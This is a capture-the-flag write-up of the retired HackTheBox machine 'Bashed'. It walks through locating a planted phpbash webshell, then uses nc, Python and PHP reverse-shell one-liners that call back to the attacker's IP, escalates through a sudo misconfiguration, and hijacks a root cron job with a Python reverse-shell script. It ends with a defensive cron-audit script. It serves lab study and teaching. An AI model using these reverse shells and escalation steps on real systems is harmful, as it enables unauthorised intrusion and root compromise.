
HacktheBox - bashed - Retired - Update






Recon


I've been using threader3000 for my recon scans lately. It does a very fast open/closed sweep of all TCP ports, then suggests an nmap scan to run against just the open ports it found. It also saves the nmap results as XML, which I then convert to HTML to make it easier to read.


xsltproc ./bashed.htb/bashed.htb.xml -o ./bashed.html



Just one open port: 80.


Nmap says it's Apache 2.4.18, and it's likely an Ubuntu box.


Let's see what is shown to us when we browse to the site.



Phpbash?

A quick Google search lands us on this GitHub repo:

https://github.com/Arrexel/phpbash


It's a php webshell, and the author says

"I actually developed it on this exact server"





And it looks like the author of the GitHub repo, Arrexel, is also the person who made this box.


I think that means there is a webshell somewhere on this server, if we can find it.


I tried the file names listed in the GitHub repo to see if I could get to the webshell.



Both returned a 404, so it must be named something else or live in another directory.


So let's use dirb to see if we can find it.




dirb found a couple of potential directories, but let's start with /dev.



Here are those PHP webshells we were looking for.



Let's look at phpbash.php.


OK, it looks like our webshell. Let's try to use it to get a real reverse shell.





Exploit

Let's start an nc listener on my Kali box to see if we can catch a reverse shell.


nc -lnvp 5555



Then in the webshell let's try


nc 10.10.14.10 5555 -e /bin/sh




Well, that didn't work: this version of netcat doesn't support -e, so we can't hand it /bin/sh.


OK, let's head over to PayloadsAllTheThings and see what other options we have for a reverse shell.


https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md


I next tried Python, which did get me a shell... but


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'




It's doubling every character I type. That happens because the pty spawned on the target echoes my input and my local terminal is echoing it too (running `stty raw -echo` locally before foregrounding the shell stops it). It still works and runs the right command, but it's ugly and I don't like it.


Since this is a PHP web server, it's likely we can use PHP to get a reverse shell.


I restarted my listener.


php -r '$sock=fsockopen("10.10.14.10",5555);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'




Much better. Let's figure out escalation now.


From just poking around in the file system, I found we can already access the user.txt in the /home/arrexel directory.


We can also get in the /home/scriptmanager folder.


I used updog (https://github.com/sc0tfree/updog) to serve linpeas.sh to bashed.



Then gave execution rights to linpeas.sh


chmod +x ./linpeas.sh


Then I ran the script. It is a local enumeration script that checks for passwords lying around, misconfigurations, and other interesting settings on the box.


Here is the first interesting thing I found in the results.




User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL


www-data can run any command as scriptmanager with no password.


So we can use this to switch to the user scriptmanager.

sudo -u scriptmanager /bin/sh




We are now in as scriptmanager. There is a folder /scripts that we were not able to access before. Let's see what is in there.



In here there are two files test.py and test.txt.


The contents of test.py are:

f = open("test.txt", "w")
f.write("testing 123!")
f.close


It opens a file named test.txt in the current directory and writes "testing 123!" to it. (The final `f.close` is missing its parentheses, so close() is never actually called; the file is flushed and closed when the interpreter exits.)


There is a file called test.txt here let's check its contents.


cat test.txt
testing 123!


But if we try to run the program we get this error, since root owns test.txt and our user only has read rights to the file.


python test.py
Traceback (most recent call last):
  File "test.py", line 1, in <module>
    f = open("test.txt", "w")
IOError: [Errno 13] Permission denied: 'test.txt'


What is strange here is that test.txt is owned by root


And it's got a recent modified time stamp…..


Like there might be a task running this test.py as root, fairly often.


I renamed test.txt to test.bak and waited a minute to see if the file came back. The rename works even though root owns the file, because a rename only needs write access to the directory, and scriptmanager has that on /scripts.


mv test.txt test.bak



It did



A couple of minutes after the rename we have a new test.txt created by root.


I think we are right in our guess, there is a process running as root that runs this test.py once every couple of minutes.



So if we could move test.py to test.py.bak and create a new python script that does something else we could elevate our privileges here.


So the super easy thing here is to do what I did the first time I did this box: simply modify test.py to open /root/root.txt and write its contents into test.txt.


# write the marker line as before, then append the root flag
f = open("test.txt", "w")
f.write("testing 123!")
f.write("\n")
# readable only because cron runs this script as root
with open("/root/root.txt") as f1:
    for line in f1:
        f.write(line)
f.write("\n")
f.close()



But this time I wanted a shell, so instead I found a reverse shell Python one-liner and modified it to work here.


I found this one-liner


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



on pentestmonkey's site:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


Since we are going to make a .py file, we can drop the `python -c '...'` wrapper: the cron job runs the file itself rather than passing a command to the interpreter.


I added some line breaks to make it slightly easier to read:


import socket, subprocess, os

# connect back to the listener on my box
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.40.10", 5566))
# point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# the interactive shell inherits those descriptors
p = subprocess.call(["/bin/sh", "-i"])



Then I setup a new listener


nc -lnvp 5566



I used my updog server to serve the file, which I named RShell.py.


And used wget again to download the file.



Then just a couple more steps.

First, let's save the current test.py by renaming it with mv.


mv test.py test.py.bak


Then rename our RShell.py to test.py, again with mv.


mv RShell.py test.py



Now we just sit back and wait for root to run our newly modified Python script.


And now we have a shell as root and grab our flag and do anything else we want with this box.



Here is the cron job that was running every minute.



I guess we didn't even need to use the same name for our Python script: the job runs every Python script in the /scripts directory once a minute.
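The two things that made this escalation possible are worth turning into a check: a root-owned, read-only file can still be renamed or replaced by anyone with write access to its directory (which is why `mv test.txt test.bak` worked), and a root cron job must never execute whatever happens to live in such a directory. The checker below is an added example and is not code from the writeup or from the box. It parses /etc/crontab-style entries, extracts the absolute paths each root job touches, and reports any file or directory a non-root user could alter. File metadata comes through a stat callback, so it runs here against a constructed in-memory model (the uids, modes, paths and crontab lines are all made up; uid 1001 stands in for scriptmanager) and on a live host against os.lstat via os_stat().

```python
"""Flag cron jobs that run as root out of paths a non-root user can change.

Added example, not from the writeup or the box. The filesystem model and crontab
below are constructed; real hosts are audited by passing os_stat as the callback.
"""
import os
import re
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Meta:
    uid: int
    gid: int
    mode: int            # permission bits only, e.g. 0o755
    is_dir: bool = False


def os_stat(path):
    """stat callback for a live host; None if the path does not exist."""
    try:
        st = os.lstat(path)
    except OSError:
        return None
    return Meta(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode), stat.S_ISDIR(st.st_mode))


def writable_by_non_root(meta):
    """True if some identity other than root can write this inode.
    A non-root owner counts even without the owner-write bit: the owner can chmod."""
    if meta.uid != 0:
        return True
    if meta.mode & stat.S_IWGRP and meta.gid != 0:
        return True
    return bool(meta.mode & stat.S_IWOTH)


def replaceable(path, stat_fn):
    """The file itself or its parent directory is writable by a non-root user.
    Directory write is enough: rename(2) and unlink(2) check the directory, not
    the file, which is why renaming a root-owned 0644 test.txt worked."""
    parent = os.path.dirname(path.rstrip("/")) or "/"
    return any(m is not None and writable_by_non_root(m)
               for m in (stat_fn(path), stat_fn(parent)))


PATH_RE = re.compile(r"(?<![\w./-])/[\w./-]+")   # absolute path tokens in a command


def cron_entries(text):
    """Yield (user, command) from /etc/crontab-style text: five time fields or an
    @shortcut, then a user field. Blank lines, comments and VAR=value lines are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            yield parts[5], parts[6]


def audit_crontab(text, stat_fn):
    """Return (path, reason) for every absolute path a root job touches that a
    non-root user could alter. A writable directory is reported on its own, since
    any script inside it (a glob like *.py included) can be added or swapped."""
    findings = []
    for user, command in cron_entries(text):
        if user != "root":
            continue
        for path in PATH_RE.findall(command):
            meta = stat_fn(path)
            if meta is None:
                continue
            if meta.is_dir:
                if writable_by_non_root(meta):
                    findings.append((path, "root job uses a directory writable by a non-root user"))
            elif replaceable(path, stat_fn):
                findings.append((path, "root job runs a file a non-root user can replace"))
    return findings


# Constructed model of the relevant part of the filesystem; uid 1001 stands in for
# scriptmanager. The real uids, modes and crontab are not shown in the writeup.
CONSTRUCTED_FS = {
    "/":                         Meta(0, 0, 0o755, True),
    "/scripts":                  Meta(1001, 1001, 0o755, True),
    "/scripts/test.py":          Meta(1001, 1001, 0o644),
    "/scripts/test.txt":         Meta(0, 0, 0o644),
    "/usr":                      Meta(0, 0, 0o755, True),
    "/usr/bin":                  Meta(0, 0, 0o755, True),
    "/usr/bin/python":           Meta(0, 0, 0o755),
    "/usr/local":                Meta(0, 0, 0o755, True),
    "/usr/local/sbin":           Meta(0, 0, 0o755, True),
    "/usr/local/sbin/rotate.sh": Meta(0, 0, 0o755),
}
CONSTRUCTED_CRONTAB = """# constructed /etc/crontab, not the one on bashed
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root cd /scripts && for f in *.py; do /usr/bin/python "$f"; done
17 * * * * root /usr/local/sbin/rotate.sh
"""

if __name__ == "__main__":
    for path, reason in audit_crontab(CONSTRUCTED_CRONTAB, CONSTRUCTED_FS.get):
        print(f"{path}: {reason}")
```

On a real box, run it as `audit_crontab(open("/etc/crontab").read(), os_stat)` and feed it the files under /etc/cron.d the same way. The directory check is the important one: in the constructed model /scripts is flagged even though nothing in the crontab names test.py, because the glob means any .py dropped into that directory runs as root.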







